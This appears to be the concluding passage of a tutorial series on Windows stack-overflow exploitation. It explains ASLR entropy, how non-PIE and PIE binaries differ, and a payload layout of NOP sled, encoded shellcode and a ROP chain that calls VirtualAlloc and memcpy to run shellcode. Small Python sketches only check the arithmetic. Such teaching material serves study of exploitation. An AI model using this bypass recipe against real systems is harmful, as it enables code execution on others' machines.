The randomization in practice: on 64-bit Windows, only bits 17–28 (or similar — the exact range depends on the OS version) of the base address are randomized. This provides roughly 2^12 = 4096 possible positions for any module, which is relatively weak compared to full 64-bit randomization. In this series, even those randomized bits are defeated by reading the base address directly from the running process.
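The entropy figure is easy to reproduce. This sketch models the bit range quoted above; it is not a measured property of any particular Windows build. It counts the possible bases and confirms that randomizing only those bits never disturbs a gadget's low 16 bits. The names are hypothetical.

```python
LOW_BIT, HIGH_BIT = 17, 28                    # range quoted above (OS-dependent)
RANDOM_BITS = HIGH_BIT - LOW_BIT + 1          # 12 bits
POSITIONS = 2 ** RANDOM_BITS                  # 4096 possible bases
RANDOM_MASK = ((1 << RANDOM_BITS) - 1) << LOW_BIT

def randomize(base: int, choice: int) -> int:
    """Place `choice` into the randomized bit range of `base`."""
    return (base & ~RANDOM_MASK) | ((choice << LOW_BIT) & RANDOM_MASK)

bases = {randomize(0x140000000, c) for c in range(POSITIONS)}
print(RANDOM_BITS, POSITIONS, len(bases))
```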
⚠ Reading the base address from the process with OpenProcess requires the exploit code to run in the same user context as the target. In a remote exploitation scenario (over a network), base address leakage requires a separate information-disclosure vulnerability.
The binary in Parts 1–4 was compiled with -no-pie (no Position Independent Executable). Part 5 re-enables Windows ASLR but keeps the binary compiled with -no-pie. This is the scenario where "a developer forgot to compile with full security hardening."
A fully PIE binary is built to be relocated, so its base is always randomized, although the offsets inside the module still do not change. The key difference:
- -no-pie with ASLR: binary may still be moved by ASLR to a random base. The internal offsets (gadget addresses relative to base) remain fixed. Our approach works.
- Full PIE + ASLR: the base address is randomized by design, while offsets within the module stay fixed. Without local access to read the base (as in a remote attack), defeating this typically requires an information leak (a way to read an address from the binary's memory) to compute gadget addresses at runtime.
💡 In real-world exploitation, information disclosure vulnerabilities (format string bugs, use-after-free with leak, etc.) are often combined with memory corruption bugs precisely to defeat PIE+ASLR. The "leak first, then exploit" pattern is fundamental to modern binary exploitation.
The complete payload structure for the final Part 5 exploit (all protections enabled):
- Position 0–249: NOP sled (8) + decoder stub (35) + encoded shellcode (207) = 250 bytes
- Position 250–295: 46 bytes of padding to reach return address offset (296)
- Position 296+: ROP chain begins (each gadget = 8 bytes):
- R9 gadget chain (set to 0x40) + NOP padding for stack skip
- R8 gadget chain (set to 0x3000)
- RCX gadget (set to 0)
- RDX gadget chain (set to 0x1002)
- VirtualAlloc call via jmp [rax]
- memcpy setup — R8 (size), RCX (dest from VirtualAlloc return), RDX (stack source)
- memcpy call
- jmp rax → execute decoded shellcode in RWX region
Total payload: approximately 700–900 bytes depending on NOP padding amounts for the R9 chain. Fits within typical buffer overflow scenarios.
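The front of that layout is fixed arithmetic: 8 + 35 + 207 = 250 bytes of shellcode section, then 46 bytes of padding up to offset 296. This small Python sketch checks that arithmetic and fails loudly if the shellcode ever grows past the return address. The ROP chain length is a parameter because it depends on the R9 padding. The function name and the example chain length are hypothetical.

```python
NOP_SLED, DECODER_STUB, ENCODED_SHELLCODE = 8, 35, 207
RET_OFFSET = 296

def layout(rop_chain_len: int) -> list[tuple[str, int, int]]:
    """(name, start, end_exclusive) for each region of the Part 5 payload."""
    regions, pos = [], 0
    for name, size in (("nop sled", NOP_SLED), ("decoder stub", DECODER_STUB),
                       ("encoded shellcode", ENCODED_SHELLCODE)):
        regions.append((name, pos, pos + size))
        pos += size
    if pos > RET_OFFSET:
        raise ValueError("shellcode section overruns the return address")
    regions.append(("padding", pos, RET_OFFSET))
    regions.append(("rop chain", RET_OFFSET, RET_OFFSET + rop_chain_len))
    return regions

for name, start, end in layout(rop_chain_len=8 * 60):   # HYPOTHETICAL 60-slot chain
    print(f"{name:<18} {start:>4}-{end - 1:<4} ({end - start} bytes)")
```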
This series covers the foundational exploit technique. The next layers of complexity in modern binary exploitation:
- Information leaks — defeating PIE requires leaking a memory address from the target process. Format string vulnerabilities, partial overwrites, and heap UAF bugs are common sources.
- Heap exploitation — stack overflows are rare in modern software due to stack canaries. Most real-world bugs today are heap-based (use-after-free, heap overflow, type confusion).
- Kernel exploitation — once user-land mitigations are mature, attacking the OS kernel directly. Requires defeating KASLR (kernel ASLR) and additional kernel-mode mitigations.
- Browser exploitation — multi-stage exploits combining a renderer bug, a sandbox escape, and a privilege escalation. Each stage independently defeats one layer of the protection stack.
💡 The foundational skills from this series — debugger fluency, ROP chain construction, shellcode encoding, and systematic bypass methodology — apply directly to all of these advanced topics. The techniques scale up; the thinking stays the same.
Lab files: overflow-static.zip and overflow4.zip are linked in the blog posts.